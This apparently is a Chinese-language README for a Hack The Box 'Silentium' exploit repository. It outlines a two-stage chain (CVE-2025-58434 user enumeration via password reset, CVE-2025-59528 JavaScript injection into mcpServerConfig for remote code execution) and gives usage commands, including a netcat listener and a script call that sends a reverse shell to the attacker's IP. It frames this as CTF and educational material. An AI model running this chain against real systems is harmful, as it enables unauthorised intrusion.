本仓库包含针对 Hack The Box 中 Silentium 机器的完整利用链。该漏洞利用分两个阶段:用户枚举和 JavaScript 注入,以实现 远程代码执行(RCE)。
该漏洞链包含一个信息泄露缺陷和一个关键代码注入。首先通过密码重置漏洞枚举有效用户,从而获得攻击 customMCP 端点所需的上下文信息。RCE 是通过将恶意 JavaScript 函数注入到 mcpServerConfig 参数中实现的,该函数由 Node.js 后端执行。
你必须安装 Python 3 和 Bash,以及以下库:
pip install requests
运行枚举脚本(Bash)来查找有效账户(需要 users.txt):
python3 CVE-2025-58434.py
在你的本地机器上启动 Netcat 监听器:
nc -lvnp 4444
执行 Python 脚本,提供目标地址、你的 IP 和获取到的 API 密钥:
python3 CVE-2025-59528.py -t -k <API_KEY> -l <YOUR_IP> -p 4444
此脚本仅用于教育目的和 CTF 环境中的授权渗透测试。未经授权访问或攻击目标是违法的。
挑战: Silentium(Hack The Box)
CVE: CVE-2025-58434 | CVE-2025-59528
| 参数 | 描述 | 必需 |
|---|
| -t, --target | 目标主机 | 是 |
| -k, --key | API Bearer Token | 是 |
| -l, --lhost | 你的监听器 IP(VPN) | 是 |
| -p, --lport | 你的监听器端口 | 是 |